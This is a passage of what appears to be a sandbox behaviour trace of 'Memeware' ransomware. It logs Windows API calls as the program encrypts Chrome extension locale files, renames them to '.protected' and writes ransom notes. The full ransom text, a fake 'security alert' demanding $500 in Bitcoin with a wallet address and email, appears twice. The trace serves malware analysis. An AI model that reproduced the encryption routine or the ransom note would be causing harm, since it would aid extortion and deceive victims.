(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.013] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.013] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.013] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.013] CloseHandle (hObject=0x164) returned 1 [0079.013] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.013] lstrcmpiW (lpString1="ja", lpString2="Windows") returned -1 [0079.013] lstrcmpiW (lpString1="ja", lpString2="Program Files") returned -1 [0079.013] lstrcmpiW (lpString1="ja", lpString2="Program Files (x86)") returned -1 [0079.013] lstrcmpiW (lpString1="ja", lpString2="$Recycle.bin") returned 1 [0079.013] lstrcmpiW (lpString1="ja", lpString2="System Volume Information") returned -1 [0079.013] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja") returned 141 [0079.013] lstrcmpW (lpString1="ja", lpString2=".") returned 1 [0079.013] lstrcmpW (lpString1="ja", lpString2="..") returned 1 [0079.013] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\*") returned 143 [0079.013] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.013] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.013] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.013] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.013] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.013] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.013] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\.") returned 143 [0079.013] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.013] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.014] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.014] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.014] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.014] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.014] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.014] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\..") returned 144 [0079.014] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.014] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.014] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.014] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.014] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.014] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.014] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.014] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.014] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json") returned 155 [0079.014] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.014] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.014] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.014] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.015] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json") returned 155 [0079.015] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.015] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json") returned 155 [0079.015] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.015] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json") returned 155 [0079.015] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.015] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0079.016] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.016] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0079.016] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.016] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.016] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.016] CloseHandle (hObject=0x168) returned 1 [0079.016] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.protected") returned 165 [0079.017] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.protected")) returned 1 [0079.017] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.017] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.017] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\RESTORE_FILES.txt") returned 159 [0079.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.017] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.018] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.018] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.018] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.018] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.018] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.018] CloseHandle (hObject=0x164) returned 1 [0079.019] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.019] lstrcmpiW (lpString1="ko", lpString2="Windows") returned -1 [0079.019] lstrcmpiW (lpString1="ko", lpString2="Program Files") returned -1 [0079.019] lstrcmpiW (lpString1="ko", lpString2="Program Files (x86)") returned -1 [0079.019] lstrcmpiW (lpString1="ko", lpString2="$Recycle.bin") returned 1 [0079.019] lstrcmpiW (lpString1="ko", lpString2="System Volume Information") returned -1 [0079.019] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko") returned 141 [0079.019] lstrcmpW (lpString1="ko", lpString2=".") returned 1 [0079.019] lstrcmpW (lpString1="ko", lpString2="..") returned 1 [0079.019] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\*") returned 143 [0079.019] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.019] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.019] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.019] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.019] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.019] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.019] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\.") returned 143 [0079.019] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.019] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.019] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.019] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.019] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.019] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.019] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.019] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\..") returned 144 [0079.019] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.019] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.019] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.019] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.020] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.020] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.020] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.020] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.020] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json") returned 155 [0079.020] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.020] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.020] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.020] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.020] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json") returned 155 [0079.020] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.020] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json") returned 155 [0079.020] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.020] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json") returned 155 [0079.020] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.020] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xda, lpOverlapped=0x0) returned 1 [0079.021] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.021] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xda, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xda, lpOverlapped=0x0) returned 1 [0079.021] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.021] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.021] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.021] CloseHandle (hObject=0x168) returned 1 [0079.021] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.protected") returned 165 [0079.021] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.protected")) returned 1 [0079.022] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.022] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.022] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\RESTORE_FILES.txt") returned 159 [0079.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.022] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.022] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.023] lstrlenA 